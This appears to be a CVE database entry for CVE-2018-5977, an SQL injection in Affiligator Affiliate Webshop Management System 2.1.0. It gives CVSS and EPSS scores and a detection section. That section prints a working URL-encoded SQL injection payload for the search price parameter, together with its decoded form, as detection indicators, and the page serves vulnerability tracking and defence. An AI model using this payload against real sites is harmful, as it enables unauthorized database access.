cbcvebase.
CVE-2018-5977
published 2018-01-24

CVE-2018-5977: SQL Injection exists in Affiligator Affiliate Webshop Management System 2.1.0 via a search/?q=&price_type=range&price= request.

PriorityP260critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
1.95%
77.8th percentile
SQL Injection exists in Affiligator Affiliate Webshop Management System 2.1.0 via a search/?q=&price_type=range&price= request.

Affected

1 ranges
VendorProductVersion rangeFixed in
getaffiligatoraffiligator

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://localhost/[PATH]/search/?q=&price_type=range&price=%31%30%30%20%61%6e%64%28%73%65%6c%65%63%74%21%56%65%72%41%79%61%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29
command%31%30%30%20%61%6e%64%28%73%65%6c%65%63%74%21%56%65%72%41%79%61%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29
path/search/?q=&price_type=range&price=
  • Monitor HTTP requests targeting the path /search/ with query parameters q=, price_type=range, and a non-empty price= value containing URL-encoded SQL payloads (e.g., percent-encoded parentheses, SQL keywords like SELECT, GROUP_CONCAT, Version()).
  • The URL-decoded SQL payload injects: '100 and(select!VerAyari-~0. from(select(select group_concat(Version()))y)x)' — look for blind/error-based SQL injection patterns in the price parameter using AND conditions and nested SELECT subqueries.
  • ·The exploit PoC uses localhost as the target host; in real-world attacks the path prefix [PATH] will vary depending on the installation directory of Affiligator.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.